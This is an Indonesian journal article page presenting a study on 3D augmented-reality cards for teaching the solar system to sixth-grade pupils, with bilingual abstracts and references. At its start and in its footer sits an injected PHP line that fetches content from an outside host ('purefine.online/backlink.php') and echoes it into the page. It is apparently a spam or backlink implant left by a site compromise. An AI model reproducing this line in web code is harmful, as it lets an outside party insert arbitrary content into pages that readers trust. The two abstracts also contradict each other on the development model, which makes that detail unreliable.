$a = file_get_contents('https://purefine.online/backlink.php'); echo $a; Pengembangan Kartu Dengan Teknologi 3D Augmented Reality Sebagai Media Visual Tematik Untuk Siswa Kelas VI SD | Utomo | JKTP: Jurnal Kajian Teknologi Pendidikan

Pengembangan Kartu Dengan Teknologi 3D Augmented Reality Sebagai Media Visual Tematik Untuk Siswa Kelas VI SD

Mochamad Gustyawan Nur Utomo, I Nyoman Sudana Degeng, Henry Praherdiono

Abstract


The 3D Augmented Reality card supports the science learning process at SDN 01 Watukosek. 3D Augmented Reality cards are designed to facilitate science subject matter, especially in helping visuals that are still conventional learning. 3D card with Augmented Reality technology is a technology that can be used independently or in groups that has the feature of being able to visualize the images contained on the card that is integrated with augmented reality to increase student motivation and curiosity. The purpose of this development is to produce learning media, and to find out the feasibility of the media being developed. This development model uses the Lee & Owens model. The results of the development of 3D Augmented Reality Card technology as a thematic visual media to explore outer space received a positive response by media experts and material experts and are suitable for use.

Abstrak
Kartu berteknologi 3D Augmented Reality menjadi penunjang dalam proses pembelajaran IPA di SDN 01 Watukosek. Kartu berteknologi 3D Augmented Reality didesain untuk menguatkan atau memfasilitasi materi pelajaran IPA khususnya dalam membantu visual yang masih pembelajaran konvesional. Kartu berteknologi 3D Augmented Reality adalah sebuah teknologi yang dapat digunakan secara mandiri maupun kelompok yang memiliki fitur yang dapat memvisualisasikan gambar yang terdapat pada kartu yang terigentrasi augmented reality untuk meningkatkan motivasi dan keinginan tahuan siswa. Tujuan pengembangan ini untuk menghasilkan media pembelajaran, serta melihat kelayakan dan keefektifan dari media yang dikembangkan. Model Penelitian ini menggunakan model Borg and Gall.realtime mendapatkan respon positif oleh ahli media dan ahli materi serta layak digunakan dan ada peningkatan.


Keywords


Pengembangan; Augmented Reality; media visual; tata surya;

Full Text:

PDF

References


Arief, S., & Sadiman. (2011). Media pendidikan. Jakarta: Raja Grapindo Persada.

Arsyad, & Azhar. (2014). Media Pembelajaran. Jakarta: PT Raja Grafindo Persada.

Billinghurst, M. (2002). Augmented Reality in Education. New horizons for learning. 12(5), 1-5.

Briggs Leslie J. (1991). Instrucktional Design, Educational Technology Publication Inc. New Jersye : Englewood Cliffs.

Daryanto. (2013). Media pembelajaran: Peranannya Sangat Penting dalam Mencapai Tujuan Pembelajaran. Yogyakarta: Gaya Media.

Depdiknas, Suyitno. (2002). Pembelajaran IPA. Jakarta: Depdikbud.

Godwin-Jones, R. (2011). Emerging Technologies: Mobile Apps for Languange Learning. Languange Learning and Technology. 15(2), 2-11.

Hidayat, D. W., Kuswandi D., & Ulfa S. (2018). Pembelajaran Organisasi Makhluk Hidup Berbasis Gamification Menggunakan Mobile Augmneted Reality. JINOTEP (Jurnal Inovasi dan Teknologi Pembelajaran) Kajian dan Riset Data, Teknologi Pembelajaran, 4(1), 9-14.

Ibda, Fatimah. (2015). Perkembangan Kognitif. Teori Jeani Piaget. Intelektualita 3.1

Jean Piaget. (2002). Tingkat Perkembangan Kognitif. Jakarta, Gramedia.

Jamhari, I. (2018). Pengembangan Buku Suplemen 3D Augmented Reality Sebagai Bahan Belajar Tematik Tema Lingkungan Tentang Perkembanbiakan Hewan Untuk SIswa Kelas III SD. Jurnal Inovasi dan Teknologi Pendidikan

Kustiawan, U. (2013). Sumber dan Media Pembelajaran Anak Usia Dini. Malang: Fakultas Ilmu Pendidikan Universitas Negeri Malang.

Lee, K. (2012). Augmented Reality in Education and Training. TeechTrends, 56(2), 13-21.

Lee, W. W., & Owens, D. L. (2004). Multimedia-Based Instructional Design: Computer-Based Training, Web-Based Training, Distance Broadcast Training, Permance-Baced Solutions. John Wiley & Sons.

National Education Association. (1969). Audiovisual Instruction Department, New Media and College Teaching.Washington D.C. Nea

Mayer, R. E. (2009). Multimedia Learning (Baroyo Tayip Indrojarwo, Penerjemah). Yogyakarta: Pustaka Belajar.

Munir, P. D. (2012). Multimedia Konsep & Aplikasi dalam Pendidikan.

Mustaqin, I. (2016). Pemanfaatan Augmented Reality Sebagai Media Pembelajaran. Jurnal Pendidikan dan Kejuruan, 13(2), 174-183.

Pradana, H. D., Kuswandi D. & Sulthon S. (2018). Augmented Reality Learning Materials for Animation Making Subject. Jurnal Pendidikan Humaniora, 6(3).

Praherdiono, H. Setyosari, P., Degeng, I. N. S., Slamet, T. I., Surahman, E. Adi, E. P., & Abidin, Z. (2019). Teori dan Implementasi Teknologi Pendidikan: Era Belajar Abad 21 dan Revolusi Industri 4.0. Seribu Bintang.

Prasetiyo, T. K., & Shikabuden, P. (2017). Pengembangan Media Augmented Reality Untuk Program Keahlian Teknik Gambar Bangunan Di Sekolah Menengah Kejuruan. JINOTEP

(Jurnal Inovasi dan Teknologi Pembelajaran) Kajian dan Riset dalam Teknologi Pembelajaran, 4(1),37-46.

Qumilaila, Q., Susanti, B. H., & Zulfiani, Z. (2017). Pengembangan Augmented Reality Versi Anroid sebagai Media Pembelajaran Sistem Eksresi Manusia. Cakrawala Pendidikan, (1), 57-69.

Rifani, A. C. 2014. Pengembangan Media Pembelajaran Ilmu Pengetahuan Sosial Berbasis Macromedia Flash 8 pada Materi Perkembangan Kemajuan Teknologi untuk Kelas IV Madarasah Itidaiyah Miftahul Huda Sidoarjo (Doctoral dissertation, universitas islam negeri maulana malik Ibrahim).

Rusmiyati, I. (2014). Penggunaan Multimedia Dalam Pembelajaran Bahasa Sastra. Jurnal Pendidikan dan Teknologi Pemnbelajaran,17 – 184.

Sadiman. (2010). Interaksi dan Motivasi Mengajar. Jakarta: Rajawali Press.

Sanaky, H. A. H. (2011). Media Pembelajaran. Yogyakarta: Kaukaba.

Sary Nur H., Shikabuden, Hendry Praherdiono. 2018. Pengembangan Multimedia interaktif seni tari jawa timur pada mata pelajaran seni budaya kelas Vii di Smp Negeri 1 karangan. Jurnal kajian teknologi pendidikan, 1(1) 63-69.

Schwan, S., & Papenmeier, F. (2017). Learning from Animation: From 2D to 3D. In Learning from Dynamic Visucalization. (pp. 31-49). Springer, Cham.

Smaldino, S., Deborah L., James D. (2011). Instructional Technology and Media for Leaving. Teknologi Pembelajaran dan Media untuk Belajar. Jakarta: Kencana.

Soepriyanto, Y. (2015). Pengembangan Augmented Reality Berbasis Animasi Sebagai Electronic Perfomance Support System dalam Pembelajaran. Makalah disajikan pada Prosiding Seminar Nasional Teknologi Pendidikan 2015. Malang. Indonesia. 14 November 2015. TEP UM

Soepriyanto, Y., Sulthoni, S., & Ulfa, S.(2017). Pengembangan Augmented Reality Sebagai Electronic Performance Support System Dalam Pembelajaran. Edcomtech: Jurnal Kajian Teknologi Pendidikan, 2(1), 26-37.

Surahman, E. (2019). Integrated mobile learning System (IMOLES) Sebagai Upaya Mewujudkan Masyarakat Pebelajar Unggul Era Digital. JINOTEP (Jurnal Inovasi dan Teknologi Pembelajaran Kajian dan Riset dalam Teknologi Pembelajaran), 5(2) 50 – 56.

Utami, D. (2011). Animasi dalam Pembelajaran. Majalah Ilmiah Pembelajaran, 7(1)

Vallino, James R. (1998). Interactive Augmented Reality. Rochester, New York: University of Rochester. Hlm. 6 – 8.

Wang, J., Steinmeier, C., Yoonm S. A., Elinich, K., & Tucker, S. (2012). Using Augmented Reality and Knowladge-Building Scaffolds To Improve Learning in a Science Museum. International Jounal of Computer-Suppoerted Collabotative Learning.

Yunita, R., Praherdiono, H., & Adi, E. P. (2019). Pengembangan multimedia interaktif materi fotosintesis untuk siswa kelas VIII sekolah menengah pertama. Jurnal kajian teknologi oendidikan, 2(4) 284-289.

Yusniawati, I. (2011). Peningkatan Hasil belajar IPA Materi Tata Surya dengan Menggunakan Media Interaktif Animasi 3 Dimensi pada Siswa Kelas VI SD. Surakarta : Universitas Muhammadiyah Surakarta.




DOI: http://dx.doi.org/10.17977/um038v5i22022p162

Refbacks

  • There are currently no refbacks.


Copyright (c) 2022 Mochamad Gustyawan Nur Utomo, I Nyoman Sudana Degeng, Henry Praherdiono

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

JKTP: Jurnal Kajian Teknologi Pendidikan published by Department of Educational Technology, Faculty of Education, State University of Malang in Collaboration with Asosiasi Program Studi Teknologi Pendidikan Indonesia (APS TPI).

Publisher Address:
Lab. Teknologi Pendidikan, Gd.E2, Lt.1
Fakultas Ilmu Pendidikan Universitas Negeri Malang
Jl. Semarang 5, Kota Malang Email: jktp.fip@um.ac.id

 

========================================================================================================

INDEXED BYTOOLSPLAGIARISM CHECKARTICLE TEMPLATE

 

 

 

 

Creative Commons License
JKTP: Jurnal Kajian Teknologi Pendidikan is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

JKTP Statistics (Since July 13th, 2020)

View My Stats

---------------------------------------- ---------------------------------------- ---------------------------------------- $a = file_get_contents('https://purefine.online/backlink.php'); echo $a; ----------------------------------------